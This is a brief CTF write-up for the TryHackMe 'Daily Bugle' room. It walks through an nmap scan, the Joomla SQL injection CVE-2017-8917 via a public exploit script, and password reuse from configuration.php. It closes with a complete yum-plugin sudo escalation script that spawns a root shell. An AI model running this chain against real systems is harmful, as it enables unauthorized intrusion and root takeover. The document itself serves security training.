Daily Bugle Write up TryHackMe

[MrSynox]

Room:
https://tryhackme.com/room/dailybugle

lets start

Nmap:

Nmap scan report for 10.10.38.239
Host is up (0.086s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
3306/tcp open mysql MariaDB (unauthorized)


Examine
Joomla 3.x.x version is running.

A few tips:
Sql injection

CVE:2017-8917​

A python script

stefanlucas/Exploit-Joomla

CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0 - stefanlucas/Exploit-Joomla

github.com

joomblah.py http:/machineip/

John time
It will take 10-20 minutes to break the hash.



The password will let us log into the Joomla administrator panel.

Note: Edit theme

What did you do? Did you get a shell?

Lets continue

To aid privilege escalation use script called linPEAS

/var/www/html/configuration.php

There is something here

Didn't you see a password?

log-in as jjameson using

su jjameson

/home/jjameson/user.txt.

You can get this now


Now onto root.

sudo -l
We learn, that we can run yum using sudo.

yum | GTFOBins

gtfobins.github.io

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

it's over

root flag is waiting for you